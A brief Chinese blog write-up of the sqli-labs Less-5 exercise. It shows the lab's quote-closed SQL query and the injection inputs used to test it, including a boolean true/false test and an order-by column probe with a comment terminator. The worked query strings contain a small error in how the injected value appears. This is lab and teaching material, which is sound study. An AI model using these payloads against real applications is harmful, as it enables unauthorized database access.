LESS—5
查看源代码得到
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";采用的是 ' ' 闭合,若直接使用/?id=1 and 1=1,则在sql语句中是
$sql="SELECT * FROM users WHERE id='id=1 and 1=1' LIMIT 0,1";明显是错误的
所以要/?id=1' and '1'='1这样写,写进去是这样的
$sql="SELECT * FROM users WHERE id='id=1' and '1'='1' LIMIT 0,1";
再报个错
$sql="SELECT * FROM users WHERE id='id=1' and '1'='2' LIMIT 0,1";
再查询一下字段
$sql="SELECT * FROM users WHERE id='id=1' order by 4 --+ LIMIT 0,1";
标签:users,labs,sqli,master,sql,LIMIT,WHERE,id,SELECT From: https://www.cnblogs.com/Zx770/p/17437923.html